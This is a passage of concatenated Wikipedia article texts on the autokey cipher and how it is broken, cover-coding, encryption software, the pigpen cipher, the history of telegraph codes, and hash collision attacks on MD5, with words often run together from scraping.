crucial weakness of the system, however, is that the plaintext is part of the key. That means that the key will likely contain common words at various points. The key can be attacked by using a dictionary of common words,bigrams,trigramsetc. and by attempting the decryption of the message by moving that word through the key until potentially-readable text appears. Consider an example messagemeet at the fountainencrypted with the primer keywordKILT:[4]To start, the autokey would be constructed by placing the primer at the front of the message: The message is then encrypted by using the key and the substitution alphabets, here a tabula recta: The attacker receives only the ciphertext and can attack the text by selecting a word that is likely to appear in the plaintext. In this example, the attacker selects the wordtheas a potential part of the original message and then attempts to decode it by placingTHEat every possible location in the key: In each case, the resulting plaintext appears almost random because the key is not aligned for most of the ciphertext. However, examining the results can suggest locations of the key being properly aligned. In those cases, the resulting decrypted text is potentially part of a word. In this example, it is highly unlikely thatdflis the start of the original plaintext and so it is highly unlikely either that the first three letters of the key areTHE. Examining the results, a number of fragments that are possibly words can be seen and others can be eliminated. Then, the plaintext fragments can be sorted in their order of likelihood: A correct plaintext fragment is also going to appear in the key, shifted right by the length of the keyword. Similarly, the guessed key fragment (THE) also appears in the plaintext shifted left. Thus, by guessing keyword lengths (probably between 3 and 12), more plaintext and key can be revealed. Trying that withoun, possibly after wasting some time with the others, results in the following: A shift of 4 can be seen to look good (both of the others have unlikely Qs either in the plaintext or in the keyword). A lot can be worked with now. The keyword is probably 4 characters long (K.LT), and some of the message is visible: Because the plaintext guesses have an effect on the key 4 characters to the left, feedback on correct and incorrect guesses is given. The gaps can quickly be filled in, giving both the plaintext and the keyword: The ease ofcryptanalysisis caused by the feedback from the relationship between plaintext and key. A three-character guess reveals six more characters (three on each side), which then reveal further characters, creating a cascade effect. That allows incorrect guesses to be ruled out quickly.
https://en.wikipedia.org/wiki/Autokey_cipher
Cover-codingis a technique for obscuring the data that is transmitted over an insecure link, to reduce the risks of snooping. An example of cover-coding would be for the sender to perform a bitwiseXOR (exclusive OR)of the original data with a password or random number which is known to both sender and receiver. The resulting cover-coded data is then transmitted from sender to the receiver, who uncovers the original data by performing a further bitwiseXOR (exclusive OR)operation on the received data using the same password or random number. ISO 18000-6C (EPC Class 1 Generation 2)RFID tagsprotect some operations with a cover code. The reader requests a random number from the tag, and the tag responds with a new random number. The reader then encrypts future communications with this number, using bitwise XOR, to the data it sends. Cover coding is secure if the tag signal can't be intercepted and the random number is not re-used. Compared to the loud transmissions from the reader, tag backscatter is much weaker and difficult -- but not impossible -- to intercept.[1][2][3] This cryptography-related article is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Cover-coding
Encryption softwareissoftwarethat usescryptographyto prevent unauthorized access to digital information.[1][2]Cryptography is used to protect digital information oncomputersas well as the digital information that is sent to other computers over theInternet.[3] There are many software products which provide encryption. Software encryption uses acipherto obscure the content intociphertext. One way to classify this type of software is the type of cipher used. Ciphers can be divided into two categories:public keyciphers (also known as asymmetric ciphers), andsymmetric keyciphers.[4]Encryption software can be based on either public key or symmetric key encryption. Another way to classify software encryption is to categorize its purpose. Using this approach, software encryption may be classified into software which encrypts "data in transit" and software which encrypts "data at rest". Data in transit generally uses public key ciphers, and data at rest generally uses symmetric key ciphers. Symmetric key ciphers can be further divided into stream ciphers and block ciphers. Stream ciphers typically encrypt plaintext a bit or byte at a time, and are most commonly used to encrypt real-time communications, such as audio and video information. The key is used to establish the initial state of a keystream generator, and the output of that generator is used to encrypt the plaintext. Block cipher algorithms split the plaintext into fixed-size blocks and encrypt one block at a time. For example, AES processes 16-byte blocks, while its predecessor DES encrypted blocks of eight bytes. There is also a well-known case where PKI is used for data in transit of data at rest. Data in transit is data that is being sent over acomputer network. When the data is between two endpoints, any confidential information may be vulnerable. The payload (confidential information) can be encrypted to secure its confidentiality, as well as its integrity and validity.[5] Often, the data in transit is between two entities that do not know each other - such as in the case of visiting a website. As establishing a relationship and securely sharing an encryption key to secure the information that will be exchanged, a set of roles, policies, and procedures to accomplish this has been developed; it is known as thepublic key infrastructure, or PKI. Once PKI has established a secure connection, a symmetric key can be shared between endpoints. A symmetric key is preferred over the private and public keys as a symmetric cipher is much more efficient (uses fewer CPU cycles) than an asymmetric cipher.[6][7]There are several methods for encrypting data in transit, such asIPsec,SCP,SFTP,SSH,OpenPGPandHTTPS. Data at rest refers to data that has been saved topersistent storage. Data at rest is generally encrypted by asymmetric key. Encryption may be applied at different layers in the storage stack. For example, encryption can be configured at thedisklayer, on a subset of a disk called apartition, on avolume, which is a combination of disks or partitions, at the layer of afile system, or withinuser spaceapplications such asdatabaseor other applications that run on the hostoperating system. With full disk encryption, the entire disk is encrypted (except for the bits necessary to boot or access the disk when not using an unencrypted boot/preboot partition).[8]As disks can be partitioned into multiple partitions, partition encryption can be used to encrypt individual disk partitions.[9]Volumes, created by combining two or more partitions, can be encrypted usingvolume encryption.[10]File systems, also composed of one or more partitions, can be encrypted usingfilesystem-level encryption. Directories are referred to as encrypted when the files within the directory are encrypted.[11][12]File encryption encrypts a single file. Database encryption acts on the data to be stored, accepting unencrypted information and writing that information to persistent storage only after it has encrypted the data. Device-level encryption, a somewhat vague term that includes encryption-capable tape drives, can be used to offload the encryption tasks from the CPU. When there is a need to securely transmit data at rest, without the ability to create a secure connection, user space tools have been developed that support this need. These tools rely upon the receiver publishing their public key, and the sender being able to obtain that public key. The sender is then able to create a symmetric key to encrypt the information, and then use the receiver's public key to securely protect the transmission of the information and the symmetric key. This allows secure transmission of information from one party to another.[citation needed] The performance of encryption software is measured relative to the speed of the CPU. Thus,cycles per byte(sometimes abbreviatedcpb), a unit indicating the number ofclock cyclesamicroprocessorwill need perbyteof data processed, is the usualunit of measurement.[13]Cycles per byte serve as a partial indicator of real-worldperformanceincryptographicfunctions.[14]Applications may offer their own encryption called native encryption, including databases applications such as Microsoft SQL, Oracle, and MongoDB, and commonly rely on direct usage of CPU cycles for performance. This often impacts the desirability of encryption in businesses seeking greater security and ease of satisfying compliance by impacting the speed and scale of how data within organizations through to their partners.[15]
https://en.wikipedia.org/wiki/Encryption_software
Some famousciphertexts(orcryptograms), in chronological order by date, are:
https://en.wikipedia.org/wiki/List_of_ciphertexts
Thepigpen cipher(alternatively referred to as themasonic cipher,Freemason's cipher,Rosicrucian cipher,Napoleon cipher, andtic-tac-toe cipher)[2][3]is a geometricsimple substitutioncipher, which exchanges letters for symbols which are fragments of a grid. The example key shows one way the letters can be assigned to the grid. The Pigpen cipher offers littlecryptographicsecurity. It differentiates itself from other simplemonoalphabetic substitutionciphers solely by its use of symbols rather than letters, the use of which fails to assist in curbingcryptanalysis. Additionally, the prominence and recognizability of the Pigpen leads to it being arguably worthless from a security standpoint. Knowledge of Pigpen is so ubiquitous that an interceptor might not need to actuallybreakthis cipher at all, but merelydecipherit, in the same way that the intended recipient would. Due to Pigpen's simplicity, it is very often included in children's books on ciphers and secret writing.[4] The cipher is believed to be an ancient cipher[5][6]and is said to have originated with theHebrewrabbis.[7][8]Thompson writes that, “there is evidence that suggests that theKnights Templarutilized a pig-pen cipher” during theChristian Crusades.[9][10] Parrangan & Parrangan write that it was used by an individual, who may have been a Mason, “in the 16th century to save his personal notes.”[11] In 1531Cornelius Agrippadescribed an early form of the Rosicrucian cipher, which he attributes to an existing JewishKabbalistictradition.[12]This system, called "The Kabbalah of the Nine Chambers" by later authors, used theHebrew alphabetrather than theLatin alphabet, and was used for religious symbolism rather than for any apparent cryptological purpose.[13] On the 7th July 1730, a French Pirate namedOlivier Levasseurthrew out a scrap of paper written in the pigpen cipher, allegedly containing the whereabouts of his treasure which was never found but is speculated to be located in Seychelles. The exact configuration of the cipher has also not been determined, an example of using different letters in different sections to further complicate the cipher from its standard configuration. Variations of this cipher were used by both theRosicrucianbrotherhood[14]and theFreemasons, though the latter used the pigpen cipher so often that the system is frequently called the Freemason's cipher. Hysin claims it was invented by Freemasons.[15]They began using it in the early 18th century to keep their records of history and rites private, and for correspondence between lodge leaders.[3][16][17]Tombstones of Freemasons can also be found which use the system as part of the engravings. One of the earliest stones inTrinity Church CemeteryinNew York City, which opened in 1697, contains a cipher of this type which deciphers to "Remember death" (cf. "memento mori"). George Washington's army had documentation about the system, with a much more randomized form of the alphabet. During theAmerican Civil War, the system was used byUnionprisoners inConfederateprisons.[14] Using the Pigpen cipher key shown in the example below, the message "X marks the spot" is rendered in ciphertext as The core elements of this system are the grid and dots. Some systems use the X's, but even these can be rearranged. One commonly used method orders the symbols as shown in the above image: grid, grid, X, X. Another commonly used system orders the symbols as grid, X, grid, X. Another is grid, grid, grid, with each cell having a letter of the alphabet, and the last one having an "&" character. Letters from the first grid have no dot, letters from the second each have one dot, and letters from the third each have two dots. Another variation of this last one is called the Newark Cipher, which instead of dots uses one to three short lines which may be projecting in any length or orientation. This gives the illusion of a larger number of different characters than actually exist.[18] Another system, used by theRosicruciansin the 17th century, used a single grid of nine cells, and 1 to 3 dots in each cell or "pen". So ABC would be in the top left pen, followed by DEF and GHI on the first line, then groups of JKL MNO PQR on the second, and STU VWX YZ on the third.[2][14]When enciphered, the location of the dot in each symbol (left, center, or right), would indicate which letter in that pen was represented.[1][14]More difficult systems use a non-standard form of the alphabet, such as writing it backwards in the grid, up and down in the columns,[4]or a completely randomized set of letters. The Templar cipher is a method claimed to have been used by theKnights Templarand uses a variant of aMaltese Cross.[19]This is likely a cipher used by the Neo-Templars (Freemasons) of the 18th century, and not that of the religious order of the Knights Templar from the 12th-14th centuries during theCrusades.[20]Some websites showing the Knights Templar cipher deviate from the original order of letters. Based on the Freemasons Document,[21]the 1st, 3rd, 4th and 5th crosses assign the letters in clock-wise order starting at the top, the 2nd cross assigns the letters in a left, right, top, bottom order while the final cross assigns the letters in a bottom, top, right left order. The Club Penguin Code,[22]also known as the Tic-Tac-Toe code,[22]the PSA cipher, and the EPF cipher, is a cipher created by online composer and artist Chris Hendricks (known online as Screenhog) for the online gameClub Penguin. Designed for use by the in-universe group Elite Penguin Force, (EPF, formerly known as Penguin Secret Agency, or PSA) the cipher leans more heavily into the style of Tic-Tac-Toe. It is represented with three grids, which each represent nine letters of the alphabet arranged left to right, top to bottom; one blank, for letters A-I, one with the letter X in each space, for letters J-R, and one with the letter O in each space, for letters S-Z, plus an additional character. This last character is used as a signature for the in-universe leader of the EPF, known as the Director. The need for a unique code came from Hendricks wishing to distance Club Penguin related materials from anything regarding Freemason orNew World Orderconspiracy theories. He said in a video uploaded to hisYouTubechannel:[23] I just didn't want Club Penguin being associated in videos like "So, Club Penguin, right? 'Fun and safe virtual world for kids?' I guess they forgot to put mind control in their advertisements! I have hard-hitting exclusive proof that Club Penguin is using the exact same code that the Illuminati use!" [...] Now, I grant you, the odds of a video like that actually gaining any traction is pretty slim, but would you take that chance? I didn't. I instead looked at the code and said "This looks a lot like Tic-Tac-Toe! What if we just copied it three times, kept the first one blank, the second one with X's, and the third one with O's? That's twenty-seven spaces. It'll cover the whole alphabet and give us something unique that's not conspiracy theory friendly." So that's what we did, and that was that.
https://en.wikipedia.org/wiki/Pigpen_Cipher
Atelegraph codeis one of thecharacter encodingsused to transmitinformationbytelegraphy.Morse codeis the best-known such code.Telegraphyusually refers to theelectrical telegraph, but telegraph systems using theoptical telegraphwere in use before that. A code consists of a number ofcode points, each corresponding to a letter of the alphabet, a numeral, or some other character. In codes intended for machines rather than humans, code points forcontrol characters, such ascarriage return, are required to control the operation of the mechanism. Each code point is made up of a number of elements arranged in a unique way for that character. There are usually two types of element (a binary code), but more element types were employed in some codes not intended for machines. For instance,American Morse codehad about five elements, rather than the two (dot and dash) ofInternational Morse Code. Codes meant for human interpretation were designed so that the characters that occurred most often had the fewest elements in the corresponding code point. For instance, Morse code forE, the most common letter in English, is a single dot (▄), whereasQis▄▄▄ ▄▄▄ ▄ ▄▄▄. These arrangements meant the message could be sent more quickly and it would take longer for the operator to become fatigued. Telegraphs were always operated by humans until late in the 19th century. When automated telegraph messages came in,codes with variable-length code pointswere inconvenient for machine design of the period. Instead, codes with a fixed length were used. The first of these was theBaudot code, a five-bitcode. Baudot has only enough code points to print inupper case. Later codes had more bits (ASCIIhas seven) so that both upper and lower case could be printed. Beyond the telegraph age, modern computers require a very large number of code points (Unicodehas 21 bits) so that multiple languages and alphabets (character sets) can be handled without having to change the character encoding. Modern computers can easily handle variable-length codes such asUTF-8andUTF-16which have now become ubiquitous. Prior to the electrical telegraph, a widely used method of building national telegraph networks was theoptical telegraphconsisting of a chain of towers from which signals could be sent by semaphore or shutters from tower to tower. This was particularly highly developed in France and had its beginnings during theFrench Revolution. The code used in France was the Chappe code, named afterClaude Chappethe inventor. TheBritish Admiraltyalso used the semaphore telegraph, but with their own code. The British code was necessarily different from that used in France because the British optical telegraph worked in a different way. The Chappe system had moveable arms, as if it were waving flags as inflag semaphore. The British system used an array of shutters that could be opened or closed.[1] The Chappe system consisted of a large pivoted beam (the regulator) with an arm at each end (the indicators) which pivoted around the regulator on one extremity. The angles these components were allowed to take was limited to multiples of 45° to aid readability. This gave a code space of 8×4×8code points, but the indicator position inline with the regulator was never used because it was hard to distinguish from the indicator being folded back on top of the regulator, leaving a code space of7×4×7 = 196. Symbols were always formed with the regulator on either the left- or right-leaning diagonal (oblique) and only accepted as valid when the regulator moved to either the vertical or horizontal position. The left oblique was always used for messages, with the right oblique being used for control of the system. This further reduced the code space to 98, of which either four or six code points (depending on version) werecontrol characters, leaving a code space for text of 94 or 92 respectively. The Chappe system mostly transmitted messages using acode bookwith a large number of set words and phrases. It was first used on an experimental chain of towers in 1793 and put into service from Paris toLillein 1794. The code book used this early is not known for certain, but an unidentified code book in theParis Postal Museummay have been for the Chappe system. The arrangement of this code in columns of 88 entries led Holzmann & Pehrson to suggest that 88 code points might have been used. However, the proposal in 1793 was for ten code points representing the numerals 0–9, and Bouchet says this system was still in use as late as 1800 (Holzmann & Pehrson put the change at 1795). The code book was revised and simplified in 1795 to speed up transmission. The code was in two divisions, the first division was 94 alphabetic and numeric characters plus some commonly used letter combinations. The second division was a code book of 94 pages with 94 entries on each page. A code point was assigned for each number up to 94. Thus, only two symbols needed to be sent to transmit an entire sentence – the page and line numbers of the code book, compared to four symbols using the ten-symbol code. In 1799, three additional divisions were added. These had additional words and phrases, geographical places, and names of people. These three divisions required extra symbols to be added in front of the code symbol to identify the correct book. The code was revised again in 1809 and remained stable thereafter. In 1837 a horizontal only coding system was introduced by Gabriel Flocon which did not require the heavy regulator to be moved. Instead, an additional indicator was provided in the centre of the regulator to transmit that element of the code.[2] TheEdelcrantzsystem was used in Sweden and was the second largest network built after that of France. The telegraph consisted of a set of ten shutters. Nine of these were arranged in a 3×3 matrix. Each column of shutters represented a binary-coded octal digit with a closed shutter representing "1" and the most significant digit at the bottom. Each symbol of telegraph transmission was thus a three-digit octal number. The tenth shutter was an extra-large one at the top. Its meaning was that the codepoint should be preceded by "A". One use of the "A" shutter was that a numeral codepoint preceded by "A" meant add a zero (multiply by ten) to the digit. Larger numbers could be indicated by following the numeral with the code for hundreds (236), thousands (631) or a combination of these. This required fewer symbols to be transmitted than sending all the zero digits individually. However, the main purpose of the "A" codepoints was for a codebook of predetermined messages, much like the Chappe codebook. The symbols without "A" were a large set of numerals, letters, common syllables and words to aidcode compaction. Around 1809, Edelcrantz introduced a new codebook with 5,120 codepoints, each requiring a two-symbol transmission to identify. There were many codepoints for error correction (272, error), flow control, and supervisory messages. Usually, messages were expected to be passed all the way down the line, but there were circumstances when individual stations needed to communicate directly, usually for managerial purposes. The most common, and simplest situation was communication between adjacent stations. Codepoints 722 and 227 were used for this purpose, to get the attention of the next station towards, or away from, the sun, respectively. For more remote stations codepoints 557 and 755 respectively were used, followed by the identification of the requesting and target stations.[3] Flag signalling was widely used for point-to-point signalling prior to the optical telegraph, but it was difficult to construct a nationwide network with hand-held flags. The much larger mechanical apparatus of the semaphore telegraph towers was needed so that a greater distance between links could be achieved. However, an extensive network with hand-held flags was constructed during theAmerican Civil War. This was thewig-wagsystem which used the code invented byAlbert J. Myer. Some of the towers used were enormous, up to 130 feet, to get a good range. Myer's code required only one flag using aternary code. That is, each code element consisted of one of three distinct flag positions. However, the alphabetical codepoints required only two positions, the third position only being used incontrol characters. Using a ternary code in the alphabet would have resulted in shorter messages because fewer elements are required in each codepoint, but a binary system is easier to read at long distance since fewer flag positions need to be distinguished. Myer's manual also describes a ternary-coded alphabet with a fixed length of three elements for each codepoint.[4] Many different codes were invented during the early development of theelectrical telegraph. Virtually every inventor produced a different code to suit their particular apparatus. The earliest code used commercially on an electrical telegraph was theCooke and Wheatstone telegraph five needle code(C&W5). This was first used on theGreat Western Railwayin 1838. C&W5 had the major advantage that the code did not need to be learned by the operator; the letters could be read directly off the display board. However, it had the disadvantage that it required too many wires. A one needle code, C&W1, was developed that required only one wire. C&W1 was widely used in the UK and the British Empire. Some other countries used C&W1, but it never became an international standard and generally each country developed their own code. In the US,American Morse codewas used, whose elements consisted of dots and dashes distinguished from each other by the length of the pulse of current on the telegraph line. This code was used on the telegraph invented bySamuel MorseandAlfred Vailand was first used commercially in 1844. Morse initially had code points only for numerals. He planned that numbers sent over the telegraph would be used as an index to a dictionary with a limited set of words. Vail invented an extended code that included code points for all the letters so that any desired word could be sent. It was Vail's code that became American Morse. In France, the telegraph used theFoy-Breguet telegraph, a two-needle telegraph that displayed the needles in Chappe code, the same code as the French optical telegraph, which was still more widely used than the electrical telegraph in France. To the French, this had the great advantage that they did not need to retrain their operators in a new code.[5] In Germany in 1848,Friedrich Clemens Gerkedeveloped a heavily modified version of American Morse for use on German railways. American Morse had three different lengths of dashes and two different lengths of space between the dots and dashes in a code point. The Gerke code had only one length of dash and all inter-element spaces within a code point were equal. Gerke also created code points for the Germanumlautletters, which do not exist in English. Many central European countries belonged to the German-Austrian Telegraph Union. In 1851, the Union decided to adopt a common code across all its countries so that messages could be sent between them without the need for operators to recode them at borders. The Gerke code was adopted for this purpose. In 1865, a conference in Paris adopted the Gerke code as the international standard, calling itInternational Morse Code. With some very minor changes, this is theMorse codeused today. The Cooke and Wheatstone telegraph needle instruments were capable of using Morse code since dots and dashes could be sent as left and right movements of the needle. By this time, the needle instruments were being made with end stops that made two distinctly different notes as the needle hit them. This enabled the operator to write the message without looking up at the needle which was much more efficient. This was a similar advantage to the Morse telegraph in which the operators could hear the message from the clicking of the relay armature. Nevertheless, after the British telegraph companies were nationalised in 1870 theGeneral Post Officedecided to standardise on the Morse telegraph and get rid of the many different systems they had inherited from private companies. In the US, telegraph companies refused to use International Morse because of the cost of retraining operators. They opposed attempts by the government to make it law. In most other countries, the telegraph was state controlled so the change could simply be mandated. In the US, there was no single entity running the telegraph. Rather, it was a multiplicity of private companies. This resulted in international operators needing to be fluent in both versions of Morse and to recode both incoming and outgoing messages. The US continued to use American Morse on landlines (radiotelegraphygenerally used International Morse) and this remained the case until the advent of teleprinters which required entirely different codes and rendered the issue moot.[6] The speed of sending in a manual telegraph is limited by the speed the operator can send each code element. Speeds are typically stated inwords per minute. Words are not all the same length, so literally counting the words will get a different result depending on message content. Instead, a word is defined as five characters for the purpose of measuring speed, regardless of how many words are actually in the message. Morse code, and many other codes, also do not have the same length of code for each character of the word, again introducing a content-related variable. To overcome this, the speed of the operator repeatedly transmitting a standard word is used. PARIS is classically chosen as this standard because that is the length of an average word in Morse.[7] In American Morse, the characters are generally shorter than International Morse. This is partly because American Morse uses more dot elements, and partly because the most common dash, the short dash, is shorter than the International Morse dash—two dot elements against three dot elements long. In principle, American Morse will be transmitted faster than International Morse if all other variables are equal. In practice, there are two things that detract from this. Firstly, American Morse, with around five coding elements was harder to get the timings right when sent quickly. Inexperienced operators were apt to send garbled messages, an effect known ashog Morse. The second reason is that American Morse is more prone tointersymbol interference(ISI) because of the larger density of closely spaced dots. This problem was particularly severe onsubmarine telegraph cables, making American Morse less suitable for international communications. The only solution an operator had immediately to hand to deal with ISI was to slow down the transmission speed.[8] Morse code for non-Latin alphabets, such asCyrillicorArabic script, is achieved by constructing acharacter encodingfor the alphabet in question using the same, or nearly the same code points as used in theLatin alphabet.Syllabaries, such as Japanesekatakana, are also handled this way (Wabun code). The alternative of adding more code points to Morse code for each new character would result in code transmissions being very long in some languages.[9] Languages that uselogogramsare more difficult to handle due to the much larger number of characters required. TheChinese telegraph codeuses a codebook of around 9,800 characters (7,000 when originally launched in 1871) which are each assigned a four-digit number. It is these numbers that are transmitted, so Chinese Morse code consists entirely of numerals. The numbers must be looked up at the receiving end making this a slow process, but in the era when telegraph was widely used, skilled Chinesetelegrapherscould recall many thousands of the common codes from memory. The Chinese telegraph code is still used by law enforcement because it is an unambiguous method of recording Chinese names in non-Chinese scripts.[10] Earlyprinting telegraphscontinued to use Morse code, but the operator no longer sent the dots and dashes directly with a single key. Instead they operated a piano keyboard with the characters to be sent marked on each key. The machine generated the appropriate Morse code point from the key press. An entirely new type of code was developed byÉmile Baudot, patented in 1874. TheBaudot codewas a 5-bit binary code, with the bits sentserially. Having a fixed length code greatly simplified the machine design. The operator entered the code from a small 5-key piano keyboard, each key corresponding to one bit of the code. Like Morse, Baudot code was organised to minimise operator fatigue with the code points requiring the fewest key presses assigned to the most common letters. Early printing telegraphs required mechanical synchronisation between the sending and receiving machine. TheHughes printing telegraphof 1855 achieved this by sending a Morse dash every revolution of the machine. A different solution was adopted in conjunction with the Baudot code. Start and stop bits were added to each character on transmission, which allowedasynchronous serial communication. This scheme of start and stop bits was followed on all the later major telegraph codes.[11] On busy telegraph lines, a variant of the Baudot code was used withpunched paper tape. This was the Murray code, invented byDonald Murrayin 1901. Instead of directly transmitting to the line, the keypresses of the operator punched holes in the tape. Each row of holes across the tape had five possible positions to punch, corresponding to the five bits of the Murray code. The tape was then run through a tape reader which generated the code and sent it down the telegraph line. The advantage of this system was that multiple messages could be sent to line very fast from one tape, making better use of the line than direct manual operation could. Murray completely rearranged the character encoding to minimise wear on the machine since operator fatigue was no longer an issue. Thus, the character sets of the original Baudot and the Murray codes are not compatible. The five bits of the Baudot code are insufficient to represent all the letters, numerals, and punctuation required in a text message. Further, additional characters are required by printing telegraphs to better control the machine. Examples of thesecontrol charactersareline feedandcarriage return. Murray solved this problem by introducingshift codes. These codes instruct the receiving machine to change the character encoding to a different character set. Two shift codes were used in the Murray code; figure shift and letter shift. Another control character introduced by Murray was thedelete character(DEL, code 11111) which punched out all five holes on the tape. Its intended purpose was to remove erroneous characters from the tape, but Murray also used multiple DELs to mark the boundary between messages. Having all the holes punched out made a perforation which was easy to tear into separate messages at the receiving end. A variant of the Baudot–Murray code became an international standard as International Telegraph Alphabet no. 2 (ITA 2) in 1924. The "2" in ITA 2 is because the original Baudot code became the basis for ITA 1. ITA 2 remained the standard telegraph code in use until the 1960s and was still in use in places well beyond then.[12] Theteleprinterwas invented in 1915. This is a printing telegraph with a typewriter-like keyboard on which the operator types the message. Nevertheless,telegramscontinued to be sent inupper caseonly because there was not room for a lower case character set in Baudot–Murray or ITA 2 codes. Teleprinters were quickly adopted by news organizations, and "wire services" supplying stories to multiple newspapers developed, but an additional application soon arose: sending finishedcopyfrom an urbannewsroomto a remote printing plant. The limited character repertoire of the 5-level codes meant that someone had to manually retype the telegram in mixed case, a laborious and error-prone operation. TheMonotype systemalready had separate keyboards and casters communicating by a paper tape, but it used a very wide 28-position paper tape to select one of 15 rows and 15 columns in thematrix case. To compete, theMergenthaler Linotype Companydeveloped aTeleTypeSetter(TTS) system which functioned similarly, but using a narrower 6-level code (the name "bit" would not be coineduntil 1948) which was more economical to transmit. TTS retained shift and unshiftcontrol characters, but they operated much like a modern keyboard: the unshift state provided lower-case letters, digits, and common punctuation, while the shift state provided upper-case letters and special symbols. TTS also included Linotype-specific features such asligaturesand a second "upper rail" shift function usually used foritalic type. A typewriter-like "perforator" would create a paper tape, and had a large dial showing the length of the line so far at the minimum and maximumspacebandwidth so the typist could decide where to break lines. This tape was then transmitted to "reperforator", and the recreated paper tape was fed into aLinotype machinewith a tape reader at the printing plant. (The tape reader could be retrofitted to an existing Linotype machine, but also special high-speed Linotype machines were made which could operate faster than a manual operator could type.) An operator was still required to handle the tapes, take the finished type to layout, addtype metalas needed, clear jams, and so on, but one operator could manage multiple Linotype machines. To keep the feed perforations in the middle of the tape, the TTS code added a "0" row beside the "1" row in ITA-2. To show the similarity to the ITS-2 code, the following tables are sorted as if this is the most-significant bit. Each shift state has 41 unique characters, making 82 in total. Adding the 8 fixed-width characters which are duplicated in the two shift states, this matches the 90-matrix capacity of a standard Linotype machine. (The variable-width space bands are a 91st character.) The first computers used existing 5-bit ITA-2 keyboards and printers due to their easy availability, but the limited character repertoire quickly became a pain point. By the 1960s, improving teleprinter technology meant that longer codes were nowhere near as significant a factor in teleprinter costs as they once were. The computer users wanted lowercase characters and additional punctuation, while both teleprinter and computer manufacturers wished to get rid of shift codes. This led theAmerican Standards Associationto develop a 7-bit code, the American Standard Code for Information Interchange (ASCII). The final form of ASCII was published in 1964 and it rapidly became the standard teleprinter code. ASCII was the last major code developed explicitly with telegraphy equipment in mind. Telegraphy rapidly declined after this and was largely replaced bycomputer networks, especially theInternetin the 1990s. ASCII had several features geared to aid computer programming. The letter characters were in numerical order of code point, so an alphabetical sort could be achieved simply by sorting the data numerically. The code point for corresponding upper and lower case letters differed only by the value of bit 6, allowing a mix of cases to be sorted alphabetically if this bit was ignored. Other codes were introduced, notablyIBM'sEBCDICderived from thepunched cardmethod of input, but it was ASCII and its derivatives that won out as thelingua francaof computer information exchange.[18] The arrival of themicroprocessorin the 1970s and thepersonal computerin the 1980s with their8-bit architectureled to the 8-bitbytebecoming the standard unit of computer storage. Packing 7-bit data into 8-bit storage is inconvenient for data retrieval. Instead, most computers stored one ASCII character per byte. This left one bit over that was not doing anything useful. Computer manufacturers used this bit inextended ASCIIto overcome some of the limitations of standard ASCII. The main issue was that ASCII was geared to English, particularly American English, and lacked theaccentedvowels used in other European languages such as French. Currency symbols for other countries were also added to the character set. Unfortunately, different manufacturers implemented different extended ASCIIs making them incompatible acrossplatforms. In 1987, theInternational Standards Organisationissued the standardISO 8859-1, for an 8-bit character encoding based on 7-bit ASCII which was widely taken up. ISO 8859character encodings were developed for non-Latin scriptssuch asCyrillic,Hebrew,Arabic, andGreek. This was still problematic if a document or data used more than one script. Multiple switches between character encodings was required. This was solved by the publication in 1991 of the standard for 16-bitUnicode, in development since 1987. Unicode maintained ASCII characters at the same code points for compatibility. As well as support for non-Latin scripts, Unicode provided code points for logograms such asChinese charactersand many specialist characters such as astrological and mathematical symbols. In 1996, Unicode 2.0 allowed code points greater than 16-bit; up to 20-bit, and 21-bit with an additional private use area. 20-bit Unicode provided support for extinct languages such asOld Italic scriptand many rarely used Chinese characters.[19] In 1931, theInternational Code of Signals, originally created for ship communication by signalling using flags, was expanded by adding a collection of five-letter codes to be used by radiotelegraph operators. An alternative representation of needle codes is to use the numeral "1" for needle left, and "3" for needle right. The numeral "2", which does not appear in most codes represents the needle in the neutral upright position. The codepoints using this scheme are marked on the face of some needle instruments, especially those used for training.[32] When used with aprinting telegraphorsiphon recorder, the "dashes" of dot-dash codes are often made the same length as the "dot". Typically, the mark on the tape for a dot is made above the mark for a dash. An example of this can be seen in the 1837 Steinheil code, which is nearly identical to the 1849 Steinheil code, except that they are represented differently in the table. International Morse code was commonly used in this form onsubmarine telegraph cables.[40]
https://en.wikipedia.org/wiki/Telegraph_code
Incryptography, acollision attackon acryptographic hashtries to find two inputs producing the same hash value, i.e. ahash collision. This is in contrast to apreimage attackwhere a specific target hash value is specified. There are roughly two types of collision attacks: More generally: Much likesymmetric-key ciphersare vulnerable tobrute force attacks, everycryptographic hash functionis inherently vulnerable to collisions using abirthday attack. Due to thebirthday problem, these attacks are much faster than a brute force would be. A hash ofnbits can be broken in 2n/2time steps (evaluations of the hash function). Mathematically stated, a collision attack finds two different messages⁠m1{\displaystyle m_{1}}⁠and⁠m2{\displaystyle m_{2}}⁠, such thathash(m1)=hash(m2){\displaystyle hash(m_{1})=hash(m_{2})}. In a classical collision attack, the attacker has no control over the content of either message, but they are arbitrarily chosen by the algorithm. More efficient attacks are possible by employingcryptanalysisto specific hash functions. When a collision attack is discovered and is found to be faster than a birthday attack, a hash function is often denounced as "broken". TheNIST hash function competitionwas largely induced by published collision attacks against two very commonly used hash functions,MD5[1]andSHA-1. The collision attacks against MD5 have improved so much that, as of 2007, it takes just a few seconds on a regular computer.[2]Hash collisions created this way are usually constant length and largely unstructured, so cannot directly be applied to attack widespread document formats or protocols. However, workarounds are possible by abusing dynamic constructs present in many formats. In this way, two documents would be created which are as similar as possible in order to have the same hash value. One document would be shown to an authority to be signed, and then the signature could be copied to the other file. Such a malicious document would contain two different messages in the same document, but conditionally display one or the other through subtle changes to the file: An extension of the collision attack is the chosen-prefix collision attack, which is specific toMerkle–Damgård hash functions. In this case, the attacker can choose two arbitrarily different documents, and then append different calculated values that result in the whole documents having an equal hash value. This attack is normally harder, a hash of n bits can be broken in 2(n/2)+1time steps, but is much more powerful than a classical collision attack. Mathematically stated, given two different prefixesp1,p2, the attack finds two suffixess1ands2such thathash(p1∥s1) =hash(p2∥s2) (where ∥ is theconcatenationoperation). More efficient attacks are also possible by employingcryptanalysisto specific hash functions. In 2007, a chosen-prefix collision attack was found against MD5, requiring roughly 250evaluations of the MD5 function. The paper also demonstrates twoX.509certificates for different domain names, with colliding hash values. This means that acertificate authoritycould be asked to sign a certificate for one domain, and then that certificate (specially its signature) could be used to create a new rogue certificate to impersonate another domain.[5] A real-world collision attack was published in December 2008 when a group of security researchers published a forgedX.509signing certificate that could be used to impersonate acertificate authority, taking advantage of a prefix collision attack against the MD5 hash function. This meant that an attacker could impersonate anySSL-secured website as aman-in-the-middle, thereby subverting the certificate validation built in everyweb browserto protectelectronic commerce. The rogue certificate may not be revokable by real authorities, and could also have an arbitrary forged expiry time. Even though MD5 was known to be very weak in 2004,[1]certificate authorities were still willing to sign MD5-verified certificates in December 